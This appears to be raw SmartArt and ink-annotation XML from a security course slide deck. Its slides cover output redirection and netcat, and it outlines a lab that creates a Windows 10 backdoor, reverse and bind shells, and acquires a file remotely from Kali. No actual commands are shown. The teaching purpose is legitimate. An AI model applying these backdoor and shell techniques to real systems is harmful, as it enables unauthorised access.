    <dgm:cxn modelId="{2260E544-65E3-4C80-93D6-127B9D168652}" type="presParOf" srcId="{8179DEE9-E403-41F5-A87D-0181CCA6BA29}" destId="{3C9B6995-C30E-4801-B34B-F7FB7836995D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8CDF162E-E3A2-47C5-A323-33E3EFDB4CF6}" type="presParOf" srcId="{8179DEE9-E403-41F5-A87D-0181CCA6BA29}" destId="{0A0B1B2D-BDD7-44E8-AD23-04F0C31F2CDB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{78FB15D8-5A40-4830-892A-8CDC61C0F622}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{EE6B7A4E-ED62-4ED1-955A-93141812DCBE}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{2B1C1C8E-FCC1-4646-A4E3-2A5F5B75F0E8}" type="presParOf" srcId="{0AC220DC-7BD2-499C-B75C-5CF54F7D4ADD}" destId="{460AB55F-F2D6-4D33-A421-3D88A995DED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D1A57-D364-4000-87E1-862042A86B45}">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Standard input/output/error devices</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="26377" y="26377"/>
        <a:ext cx="6646626" cy="847812"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C952050B-D692-42B2-B6C6-D9FF89C7CC10}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="644414" y="1064305"/>
          <a:ext cx="7694506" cy="900566"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="319356"/>
            <a:satOff val="-1825"/>
            <a:lumOff val="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Network utilities use standard devices</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="670791" y="1090682"/>
        <a:ext cx="6411969" cy="847812"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F4D5357D-4E8C-4757-8268-C80192744DD3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1279211" y="2128610"/>
          <a:ext cx="7694506" cy="900566"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="638711"/>
            <a:satOff val="-3650"/>
            <a:lumOff val="35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Create a backdoor at Window 10/Remote File Acquisition</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1305588" y="2154987"/>
        <a:ext cx="6421587" cy="847812"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{09FD2FBB-6BDF-47D8-9E72-5B5D698C23DC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1923626" y="3192915"/>
          <a:ext cx="7694506" cy="900566"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="958067"/>
            <a:satOff val="-5475"/>
            <a:lumOff val="52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Reverse shell</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1950003" y="3219292"/>
        <a:ext cx="6411969" cy="847812"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AAE43954-22E9-4644-92C8-9F7A82CCCAFB}">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8658780E-DE24-42FB-9CF8-5E7F9B2B1738}">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505565"/>
            <a:satOff val="4983"/>
            <a:lumOff val="475"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="19050" cap="rnd" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="505565"/>
              <a:satOff val="4983"/>
              <a:lumOff val="4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51BA17FE-5A34-42DF-BDD7-835351B0DB1D}">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1011130"/>
            <a:satOff val="9966"/>
            <a:lumOff val="951"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="19050" cap="rnd" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="1011130"/>
              <a:satOff val="9966"/>
              <a:lumOff val="9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FE39A-9BA9-4D2F-85A1-DB783B7FF4B8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2470633"/>
          <a:ext cx="9618133" cy="16210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Solution</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2470633"/>
        <a:ext cx="9618133" cy="875341"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{976D2CC0-DBFD-44F6-8CD0-2010504F5D42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3313554"/>
          <a:ext cx="4809066" cy="74566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Use Zenmap</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3313554"/>
        <a:ext cx="4809066" cy="745661"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{14456EC4-9209-4B9A-9130-1D2B6232CD43}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4809066" y="3313554"/>
          <a:ext cx="4809066" cy="745661"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:tint val="40000"/>
            <a:alpha val="90000"/>
            <a:hueOff val="1011130"/>
            <a:satOff val="9966"/>
            <a:lumOff val="951"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="19050" cap="rnd" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:tint val="40000"/>
              <a:alpha val="90000"/>
              <a:hueOff val="1011130"/>
              <a:satOff val="9966"/>
              <a:lumOff val="9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netcat is integrated into Zenmap</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4809066" y="3313554"/>
        <a:ext cx="4809066" cy="745661"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{840DB5AA-C142-4CA9-A04D-786A8A72D61B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="0" y="1845"/>
          <a:ext cx="9618133" cy="2493102"/>
        </a:xfrm>
        <a:prstGeom prst="upArrowCallout">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent2">
            <a:hueOff val="958067"/>
            <a:satOff val="-5475"/>
            <a:lumOff val="52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Send files from Kali to Windows 10</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="0" y="1845"/>
        <a:ext cx="9618133" cy="1619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88368-8276-471A-A40A-8843C73DF173}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="389596" y="1330015"/>
          <a:ext cx="628857" cy="6288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A0EA44-A96C-4C24-8580-64AB96E73839}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5294"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There are two places programs send output to: Standard output (stdout) and Standard Error (stderr);</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5294" y="2204481"/>
        <a:ext cx="1397460" cy="558984"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E163AF8E-1215-4D26-8A36-97DCBF7D7F1B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2031612" y="1330015"/>
          <a:ext cx="628857" cy="6288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01E6B8-4A73-4C3F-9111-284A9C8AF57F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1647311"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You can redirect these outputs to a different place (like a file);</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1647311" y="2204481"/>
        <a:ext cx="1397460" cy="558984"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1EEE94CC-2C28-4F97-8528-9C5C648E47F3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3673629" y="1330015"/>
          <a:ext cx="628857" cy="6288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320A24-EF85-4312-A899-99BBE36CD8BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3289327"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File descriptors are used to identify stdout (1) and stderr (2);</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3289327" y="2204481"/>
        <a:ext cx="1397460" cy="558984"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D16BF0E6-479D-4924-B7F5-F82D72AF8F8F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5315646" y="1330015"/>
          <a:ext cx="628857" cy="6288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576F12-437F-411F-BD19-C98DF4696C5A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4931344"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command &gt; output is just a shortcut for command 1&gt; output;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4931344" y="2204481"/>
        <a:ext cx="1397460" cy="558984"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2A920D47-CC62-4189-A54B-CD80B5B91CF5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6957662" y="1330015"/>
          <a:ext cx="628857" cy="6288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BFD4AB-9F9B-4113-8DB1-4AC637568A32}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6573360"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You can use &amp;[FILE_DESCRIPTOR] to reference a file descriptor value;</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6573360" y="2204481"/>
        <a:ext cx="1397460" cy="558984"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C439E1C6-CCCF-42DB-BAAB-1A534A55E923}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8599679" y="1330015"/>
          <a:ext cx="628857" cy="6288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B2FD82-F60E-46C0-8C17-15A7F5741DED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8215377" y="2204481"/>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Using 2&gt;&amp;1 will redirect stderr to whatever value is set to stdout (and 1&gt;&amp;2 will do the opposite).</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8215377" y="2204481"/>
        <a:ext cx="1397460" cy="5589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D9AAB-FAE9-4CDA-97C8-043A29EBE4A2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2470633"/>
          <a:ext cx="9618133" cy="16210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firewall etc. may block the bind shell</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2470633"/>
        <a:ext cx="9618133" cy="1621002"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{63DA1529-FF99-4C5F-AECE-7FD8E59CD8AD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="0" y="1845"/>
          <a:ext cx="9618133" cy="2493102"/>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dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="0" y="1845"/>
        <a:ext cx="9618133" cy="1619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08E3A-5506-44FA-A2BC-D08FF194DB6D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="330114"/>
          <a:ext cx="9618133" cy="10773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395732" rIns="74647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name it </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" i="1" kern="1200"/>
            <a:t>yourFisrtLastNameEvidence.txt</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1900" kern="1200"/>
        </a:p>
        <a:p>
          <a:pPr marL="171450" lvl="1" indent="-171450" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>the content of the file “hello </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" i="1" kern="1200"/>
            <a:t>yourname!</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>”</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="330114"/>
        <a:ext cx="9618133" cy="1077300"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1E3D7A19-3812-424C-B1CF-C1683BDC44E2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="480906" y="49674"/>
          <a:ext cx="6732693" cy="5608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44550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>Create a file in Windows</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="508286" y="77054"/>
        <a:ext cx="6677933" cy="506120"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4808E826-A5A3-4682-8810-B89CE61FEF5E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1790454"/>
          <a:ext cx="9618133" cy="10773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395732" rIns="74647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you allow to access Windows from Kali</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="171450" lvl="1" indent="-171450" algn="l" defTabSz="844550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>assume nmap is installed</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1790454"/>
        <a:ext cx="9618133" cy="1077300"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{563F0EF0-C7FD-40E9-BF30-6750726BFA38}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="480906" y="1510014"/>
          <a:ext cx="6732693" cy="5608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44550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>You don’t allow to touch Windows directly after you create the file</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="508286" y="1537394"/>
        <a:ext cx="6677933" cy="506120"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{460AB55F-F2D6-4D33-A421-3D88A995DED1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3250794"/>
          <a:ext cx="9618133" cy="793012"/>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395732" rIns="74647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use command lines, e.g., nc</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3250794"/>
        <a:ext cx="9618133" cy="793012"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0A0B1B2D-BDD7-44E8-AD23-04F0C31F2CDB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="480906" y="2970354"/>
          <a:ext cx="6732693" cy="5608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44550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1900" kern="1200"/>
            <a:t>Remotely acquire the file from Kali</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="508286" y="2997734"/>
        <a:ext cx="6677933"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14.429"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">311 1 24575,'7'39'0,"-6"-36"0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,-2 2 0,-58 69 0,54-63 0,1 0 0,0 1 0,1 0 0,0 0 0,1 1 0,1-1 0,-7 27 0,7-29 0,0 1 0,-1 0 0,0-1 0,-1 0 0,-1 0 0,1-1 0,-1 1 0,-1-2 0,0 1 0,-10 8 0,-31 39 0,35-37 0,9-14 0,0 1 0,0 0 0,1 1 0,0-1 0,0 1 0,0-1 0,1 1 0,0 0 0,1 1 0,-1-1 0,1 0 0,1 1 0,0-1 0,-1 15 0,1 16 0,0-16 0,1 1 0,0 0 0,8 40 0,-4-54 0,0 1 0,1-1 0,0 0 0,1 0 0,0 0 0,0-1 0,13 13 0,-4-3 0,-9-12 0,0 1 0,0-1 0,1-1 0,0 1 0,0-1 0,0 0 0,1 0 0,-1-1 0,1 0 0,0-1 0,0 1 0,1-2 0,-1 1 0,1-1 0,-1 0 0,1-1 0,0 0 0,10 0 0,53 9 0,-52-6 0,-1-1 0,23 0 0,3-2 0,-13 0 0,1-1 0,34-5 0,-58 4 0,0 0 0,0-1 0,-1 0 0,1-1 0,-1 0 0,1-1 0,-1 1 0,0-1 0,0-1 0,-1 0 0,1 0 0,8-8 0,68-66 0,-76 73 0,-1-1 0,1 1 0,0 1 0,1-1 0,-1 2 0,1-1 0,13-4 0,-13 5 0,0 1 0,-1-2 0,0 1 0,1-1 0,-1 0 0,-1-1 0,1 0 0,9-10 0,60-91 0,-70 96 0,0 0 0,0-1 0,-1 1 0,-1-1 0,0-1 0,0 1 0,-1-1 0,3-20 0,6-13 0,1 1 0,-7 27 0,-2 0 0,0 0 0,0-1 0,-2 1 0,2-38 0,-3 16 0,-1 27 0,0 0 0,-1 0 0,0 0 0,-1 0 0,-1 0 0,0 0 0,-6-21 0,6 30 0,0-1 0,-1 1 0,0 0 0,1 0 0,-2 0 0,1 0 0,0 1 0,-1-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,-1 0 0,0 0 0,1 1 0,-1-1 0,0 1 0,-6-1 0,-11 0 0,0 0 0,0 1 0,-36 4 0,7 0 0,-306-3 0,337 1 20,1 2-1,0 0 0,0 1 0,0 1 1,-26 11-1,-40 9-1500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15:26.200"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'0'3'0,"4"1"0,3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05.146"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'4'0'0,"3"0"0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16.952"/>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4:30.794"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'4'0'0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3:37.763"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575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6:49.88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9:12.468"/>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5:37.926"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'3'0'0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9:26.527"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'0'3'0,"3"2"0,5-1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6.349"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 657 24575,'27'-1'0,"0"2"0,0 0 0,-1 2 0,1 1 0,38 11 0,148 63 0,-133-47 0,-51-19 0,60 17 0,-82-27 0,1 1 0,-1 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,6 6 0,-8-6 0,1 0 0,0 0 0,0-1 0,0 1 0,1-1 0,-1-1 0,1 1 0,13 2 0,14 2 0,0 2 0,-1 1 0,50 22 0,-41-15 0,56 15 0,32-7 0,-99-19 0,50 17 0,-19-4 0,265 67 0,-282-74 0,61 25 0,88 33 0,-88-34 0,-57-19 0,-1-1 0,53 9 0,73 19 0,-156-40 0,-1 0 0,23 10 0,-24-8 0,0-1 0,30 6 0,236 40 0,-238-39 0,64 11 0,-67-14 0,49 16 0,-26-7 0,176 42 0,-186-42 0,-39-12 0,0 0 0,31 5 0,-24-6 0,-1 1 0,37 14 0,-39-13 0,0 0 0,-1-1 0,2-1 0,20 2 0,79 14 0,-87-13 0,1-2 0,65 4 0,-77-8 0,0 0 0,0 2 0,0 0 0,0 2 0,21 8 0,28 7 0,-26-8 0,1 3 0,47 24 0,-61-25 0,-15-7 0,1 0 0,32 9 0,22 5 0,120 54 0,-179-72 0,0-1 0,0 0 0,1 0 0,0-1 0,-1-1 0,1 0 0,16-1 0,-15 0 0,0 0 0,0 1 0,0 0 0,-1 1 0,1 1 0,13 4 0,-6 0 0,0-2 0,0 0 0,1-1 0,-1-1 0,25 0 0,-25-2 0,109 19 0,1 2 0,-101-17 0,0 2 0,42 16 0,-1-1 0,116 22 0,-151-34 0,58 10 0,-49-11 0,-29-6 0,0 0 0,21 2 0,-13-3 0,1 2 0,47 12 0,-50-9 0,0-2 0,1-1 0,-1 0 0,24 0 0,-19-3 0,51 10 0,-31-3 0,55 11 0,-67-11 0,0-2 0,0-1 0,39 1 0,-69-6 0,22-1 0,1 1 0,-1 2 0,48 9 0,-40-6 0,0-1 0,0-1 0,1-2 0,38-4 0,6 1 0,-46 4 0,50 8 0,-49-5 0,46 2 0,-45-6 0,39 8 0,-38-4 0,38 1 0,-41-4 0,40 7 0,-40-4 0,41 1 0,50 4 0,1 1 0,5 0-110,0 0-597,-86-9 707,86 17 0,9 1 0,-80-17-421,-22-1 356,55 8 0,-72-6 59,27 6-93,0-3 1,68 3-1,-87-9 179,43 9 1,-43-6-3,42 2 1,46-7-79,84 2 0,-122 10 0,-49-7 0,46 3 0,638-8 582,-682 0-582,46-9 0,-45 5 0,44-1 0,1052 5-472,-508 3 280,-586-4 192,45-8 0,27 0 0,-38 5-91,0-3 0,78-19 1,-20 0 598,-28 8 271,-63 11-639,0 2-1,54-4 1,-56 8-140,40-8 0,-9 1 0,51-11 0,-78 12 0,1 1 0,49-1 0,-61 6 0,38-7 0,-38 4 0,37-1 0,-20 5 0,-5 1 0,0-2 0,48-8 0,64-12 0,-26 9 0,-83 11 0,43-8 0,124-42 0,-20-1 0,-54 14 0,-76 23 93,163-39-778,-164 42 679,143-23-31,-126 32 37,-47 4 0,1-2 0,-1-1 0,51-12 0,128-43 99,81-20 450,-110 32-562,26-2 13,-154 39 0,-36 7 0,1-1 0,26-9 0,-10 1 0,0 1 0,1 1 0,0 1 0,38-3 0,82-10 0,-133 17 0,-1 0 0,1-2 0,-1 0 0,0-1 0,23-13 0,12-4 0,-37 16 0,0 0 0,17-13 0,-20 13 0,0 0 0,0 1 0,26-10 0,89-32 0,-60 23 0,-45 16 0,0 2 0,37-10 0,17-1 0,41-6 0,-94 19 0,-1 0 0,0-1 0,-1-2 0,42-21 0,-18 8 0,25-8 0,-19 8 0,66-37 0,-82 39 0,-25 15 0,1-1 0,-2-1 0,1 0 0,14-12 0,-11 7 0,1 1 0,1 1 0,0 0 0,0 1 0,0 1 0,34-12 0,-48 19 0,202-89 0,-184 79 0,32-21 0,-34 20 0,36-19 0,-19 13 0,48-33 0,-75 45 0,33-21 0,53-33 0,91-56 0,-143 93 0,2 1 0,0 2 0,2 3 0,71-20 0,-94 